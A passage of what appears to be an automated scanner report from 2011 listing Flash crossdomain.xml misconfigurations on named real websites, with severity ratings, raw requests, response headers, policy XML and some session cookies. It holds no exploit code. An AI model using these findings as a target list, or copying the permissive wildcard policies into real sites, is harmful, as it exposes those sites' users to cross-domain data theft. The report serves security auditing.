6.136. http://www.yougamers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yougamers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yougamers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:25 GMT
Server: Apache/2.2.3 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=f76d144a17ee4ba556d110b1a373b8c6; path=/
Last-Modified: Tue, 03 May 2011 22:38:06 +0000
ETag: "1304462286"
Content-Length: 200
Connection: close
Content-Type: text/html

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.137. http://www.youtongue.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.youtongue.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtongue.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:23 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Tue, 06 Apr 2010 15:41:33 GMT
ETag: "11317b-cd-4bbb562d"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.138. http://www.zdf.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zdf.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zdf.de

Response

HTTP/1.1 200 OK
Content-Length: 1112
Content-Type: application/xml
Accept-Ranges: bytes
Server: Apache/2
X-Cache: MISS from www.zdf.de
Date: Wed, 04 May 2011 01:18:17 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy>    <allow-access-from domain="*"/>    <allow-access-from domain="www.heute.t-online.de"/>    <allow-access-from domain="heute.t-online.de"/>
...[SNIP]...
<allow-access-from domain="*.heute.de"/>
...[SNIP]...
<allow-access-from domain="*.zdf.de"/>
...[SNIP]...
<allow-access-from domain="*.tivi.de"/>    <allow-access-from domain="cmsorange.zdf.de"/>    <allow-access-from domain="zdf.ivwbox.de"/>    <allow-access-from domain="2df.ivwbox.de"/>    <allow-access-from domain="zdfsup.ivwbox.de"/>    <allow-access-from domain="heute.ivwbox.de"/>    <allow-access-from domain="sportzdf.ivwbox.de"/>    <allow-access-from domain="*.ivwbox.de"/>    <allow-access-from domain="peking.zdf.de"/>    <allow-access-from domain="*.nacamar.net"/>        <allow-access-from domain="test1.syzygy.de"/>    <allow-access-from domain="zdf.3m5-extra.net"/>    <allow-access-from domain="*.gmodules.com"/>
...[SNIP]...

6.139. http://www.adam4cams.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adam4cams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adam4cams.com

Response

HTTP/1.1 200 OK
Server: unknown
Date: Wed, 04 May 2011 01:19:42 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Thu, 10 Jun 2010 14:24:45 GMT
Accept-Ranges: bytes
Content-Length: 936
Vary: Accept-Encoding

<cross-domain-policy>
<allow-access-from domain="*.mycams.com" />
<allow-access-from domain="*.mycamsdevel.com" />
<allow-access-from domain="*.awempire.com"/>
<allow-access-from domain="*.jasmin.com"/>
<allow-access-from domain="*.lsl.com"/>
<allow-access-from domain="*.livesexbar.com"/>
<allow-access-from domain="*.hothouselive.com"/>
<allow-access-from domain="*.adam4cams.com"/>
<allow-access-from domain="*.janacam.com"/>
<allow-access-from domain="*.cfnmcamgirls.com"/>
<allow-access-from domain="*.manhuntlive.com"/>
<allow-access-from domain="*.redcherrylive.net"/>
<allow-access-from domain="*.homoemolive.com"/>
<allow-access-from domain="*.livejasmin.com"/>
<allow-access-from domain="*.livegymboys.com"/>
<allow-access-from domain="*.hardcamtube.com"/>
<allow-access-from domain="*.streamgfs.com"/>
<allow-access-from domain="*.jmg"/>
...[SNIP]...

6.140. http://www.adtotal.pl/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adtotal.pl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adtotal.pl

Response

HTTP/1.0 200 OK
Server: aris
Content-Type: text/xml
Set-Cookie: statid=173.193.214.243.3917:1304472543:364986198:v1; path=/; expires=Sat, 03-May-14 01:29:03 GMT
Set-Cookie: statid=173.193.214.243.3917:1304472543:364986198:v1; domain=.wp.pl; path=/; expires=Sat, 03-May-14 01:29:03 GMT
Content-Length: 363
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.wp.pl"/>
   <allow-access-from domain="*.wp-sa.pl"/>
   <allow-access-from domain="*.wp.tv"/>
   <allow-access-from domain="wp.tv"/>
   <allow-access-from domain="wpmobi.pl"/>
   <allow-access-from domain="odkrywcy.pl"/>
   <allow-access-from domain="przymierzalnia.tanio.pl"/>
...[SNIP]...

6.141. http://www.allaccess.com.ph/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allaccess.com.ph
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allaccess.com.ph

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:21:41 GMT
Server: Apache/2.2.4 (Unix) PHP/4.4.7
Last-Modified: Fri, 02 Oct 2009 04:17:20 GMT
ETag: "624068-107-474ec0a415400"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.allaccess.com.ph" />
<allow-access-from domain="gmanews.tv" />
...[SNIP]...

6.142. http://www.artistrising.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.artistrising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.artistrising.com

Response

HTTP/1.1 200 OK
Age: 1
Date: Wed, 04 May 2011 02:30:08 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Content-Length: 642
Content-Type: text/xml
Content-Location: http://www.artistrising.com/crossdomain.xml
Last-Modified: Fri, 10 Jul 2009 05:21:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*.allposters.com"/>
   <allow-access-from domain="*.allposters.co.uk"/>
   <allow-access-from domain="*.art.com"/>
   <allow-access-from domain="*.art.co.uk"/>
   <allow-access-from domain="*.artistrising.com"/>
...[SNIP]...

6.143. http://www.bikerplanet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bikerplanet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bikerplanet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:33 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 15:24:09 GMT
Accept-Ranges: bytes
Content-Length: 270
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.userplane.com" />
...[SNIP]...

6.144. http://www.bmwmotorcycles.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bmwmotorcycles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bmwmotorcycles.com

Response

HTTP/1.0 200 OK
Server: BMW Webservice
Last-Modified: Wed, 09 Dec 2009 11:55:04 GMT
ETag: "10f2de6-8a5-47a4a5c723600"
Content-Type: application/xml
Date: Wed, 04 May 2011 00:47:28 GMT
Content-Length: 2213
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 01:47:28 GMT

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.bmw-motorrad.com" />
   <!-- Europe -->
   <allow-access-from domain="*.bmw-motorrad.at" />
   <allow-access-from domain="*.bmw-motorrad.be" />
   <allow-access-from domain="*.bmw-motorrad.bg" />
   <allow-access-from domain="*.bmw-motorrad.ch" />
   <allow-access-from domain="*.bmw-motorrad.cz" />
   <allow-access-from domain="*.bmw-motorrad.de" />
   <allow-access-from domain="*.bmw-motorrad.dk" />
   <allow-access-from domain="*.bmw-motorrad.es" />
   <allow-access-from domain="*.bmw-motorrad.fi" />
   <allow-access-from domain="*.bmw-motorrad.fr" />
   <allow-access-from domain="*.bmw-motorrad.gr" />
   <allow-access-from domain="*.bmw-motorrad.ie" />
   <allow-access-from domain="*.bmw-motorrad.it" />
   <allow-access-from domain="*.bmw-motorrad.lu" />
   <allow-access-from domain="*.bmw-motorrad.nl" />
   <allow-access-from domain="*.bmw-motorrad.no" />
   <allow-access-from domain="*.bmw-motorrad.pt" />
   <allow-access-from domain="*.bmw-motorrad.ro" />
   <allow-access-from domain="*.bmw-motorrad.rs" />
   <allow-access-from domain="*.bmw-motorrad.ru" />
   <allow-access-from domain="*.bmw-motorrad.se" />
   <allow-access-from domain="*.bmw-motorrad.si" />
   <allow-access-from domain="*.bmw-motorrad.sk" />
   <allow-access-from domain="*.bmw-motorrad.com.ua" />
   <allow-access-from domain="*.bmw-motorrad.co.uk" />
...[SNIP]...
<allow-access-from domain="*.bmw-motorrad.com.ar" />
   <allow-access-from domain="*.bmw-motorrad.com.br" />
   <allow-access-from domain="*.bmw-motorrad.com.co" />
   <allow-access-from domain="*.bmw-motorrad.com.ec" />
   <allow-access-from domain="*.bmw-motorrad.com.gt" />
   <allow-access-from domain="*.bmw-motorrad.com.mx" />
   <allow-access-from domain="*.bmw-motorrad.com.pa" />
   <allow-access-from domain="*.bmw-motorrad.com.sv" />
   <allow-access-from domain="*.bmw-motorrad.com.ve" />
   <allow-access-from domain="*.bmw-motorrad.co.ve" />
   <allow-access-from domain="*.bmw-motorrad.cl" />
   <allow-access-from domain="*.bmwmotorcycles.com" />
...[SNIP]...
<allow-access-from domain="*.bmwgroup.com" />
   <allow-access-from domain="www8i.muc:5251" />
   <allow-access-from domain="www8i.muc:5258" />
...[SNIP]...

6.145. http://www.bookfresh.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bookfresh.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bookfresh.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 25 Mar 2010 23:26:50 GMT
ETag: "176089e-122-61934280"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bookfresh.com" />
<allow-access-from domain="images.bookfresh.com.s3.amazonaws.com" />
...[SNIP]...

6.146. http://www.brockport.edu/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.brockport.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.brockport.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:30 GMT
Server: Apache
Last-Modified: Mon, 18 Apr 2011 15:32:13 GMT
ETag: "634a0c-d7-4a133187b9940"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.brockport.edu" />
</cross-d
...[SNIP]...

6.147. http://www.bullionvault.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bullionvault.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bullionvault.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C3CB6E219641133CED3AC412FB3DDC21; Path=/
Accept-Ranges: bytes
ETag: W/"448-1301569156000"
Last-Modified: Thu, 31 Mar 2011 10:59:16 GMT
Content-Type: application/xml
Content-Length: 448
Date: Wed, 04 May 2011 03:45:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.telegraph.co.uk" />
...[SNIP]...
<allow-access-from domain="static.bullionvault.com" />
   <allow-access-from domain="live.bullionvault.com" />
...[SNIP]...

6.148. http://www.camscape.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.camscape.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.camscape.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:40:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 Feb 2008 01:32:27 GMT
ETag: "1d306a5-141-4463c7ed960c0"
Accept-Ranges: bytes
Content-Length: 321
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.camstreams.com" />
<allow-access-from domain="*.patsflat.com" />
<allow-access-from domain="*.camscape.com" />
...[SNIP]...

6.149. http://www.cashfiesta.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cashfiesta.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cashfiesta.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:56 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 11:21:21 GMT
ETag: "10801e8-e9-4930a9be0ce40"
Accept-Ranges: bytes
Content-Length: 233
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cashfiesta.com" secure="false"/>
...[SNIP]...

6.150. http://www.columbuslocalnews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.columbuslocalnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.columbuslocalnews.com

Response

HTTP/1.0 200 OK
Server: WWW
Content-Type: application/xml
Date: Wed, 04 May 2011 01:49:01 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1593037"
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
Last-Modified: Fri, 09 Jan 2009 22:40:41 GMT
X-Cache-Info: caching
Real-Hostname: columbuslocalnews.com
Content-Length: 127

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.mytiwi.com" to-ports="*" />
</cross-domain-policy>

6.151. http://www.contentedits.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentedits.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contentedits.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:50:56 GMT
Content-Length: 414
Content-Type: text/xml
Last-Modified: Thu, 30 Apr 2009 19:52:40 GMT
Accept-Ranges: bytes
ETag: "d4973a38cdc9c91:2cca7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!-- http://www.contentedits.com/crossdomain.xml -->
<cross-domain-policy>
<!--INFOMEDIA-->
   <allow-access-from domain="*.infomedia.net"/>
   <allow-access-from domain="infomedia.com"/>
   <allow-access-from domain="www.infomedia.com"/>
...[SNIP]...
<allow-access-from domain="threemommas.com"/>
   <allow-access-from domain="www.threemommas.com"/>
...[SNIP]...

6.152. http://www.cybermonday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cybermonday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cybermonday.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:55 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304477575754491; path=/; expires=Thu, 03-May-12 02:52:55 GMT
Last-Modified: Tue, 26 Apr 2011 19:57:14 GMT
ETag: "709a2-f6-4a1d7bafc9a80"
Accept-Ranges: bytes
Content-Length: 246
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.chase.com"/>
<allow-http-request-headers-from domain="*.ch
...[SNIP]...

6.153. http://www.dailyadvance.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyadvance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyadvance.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:44:44 GMT
Content-Type: application/rss+xml; charset=utf-8
Connection: close
Content-Length: 359
Last-Modified: Wed, 04 May 2011 01:26:50 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.dailyadvance.com" />
<allow-access-from domain="*.www.dailyadvance.com" />
...[SNIP]...

6.154. http://www.dana.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dana.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dana.org

Response

HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 14:51:34 GMT
Accept-Ranges: bytes
ETag: "b4deb184d52ec91:349"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:23:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.dana.org" />
<allow-access-from domain="*.n4m.net" />
...[SNIP]...

6.155. http://www.deathpenaltyinfo.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.deathpenaltyinfo.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deathpenaltyinfo.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:53 GMT
Server: Apache/2.2.14
Set-Cookie: SESS264c8d63753285e01f38f546fd450a23=2aedf043179e82e2a60521d5a2b698a9; expires=Fri, 27-May-2011 07:43:13 GMT; path=/; domain=.deathpenaltyinfo.org
Set-Cookie: mt_redirect=true; expires=Fri, 03-Jun-2011 04:09:53 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 04:09:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Length: 401
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.deathpenaltyinfo.org" />
...[SNIP]...
<allow-access-from domain="*.www.deathpenaltyinfo.org" />
...[SNIP]...
<allow-access-from domain="*.www.deathpenaltyinfo.org" />
...[SNIP]...

6.156. http://www.dundermifflininfinity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dundermifflininfinity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dundermifflininfinity.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Last-Modified: Fri, 13 Feb 2009 23:24:13 GMT
ETag: "6140294-1aa-462d5227cc140"
Accept-Ranges: bytes
Content-Length: 426
Wirt: (null)
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:26:18 GMT
Date: Wed, 04 May 2011 03:21:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nbbcdev.com" />
<allow-access-from domain="*.nbbc.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.dundermifflininfinity.com" />
<allow-access-from domain="*.bunchball.com" />
...[SNIP]...

6.157. http://www.film4.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.film4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

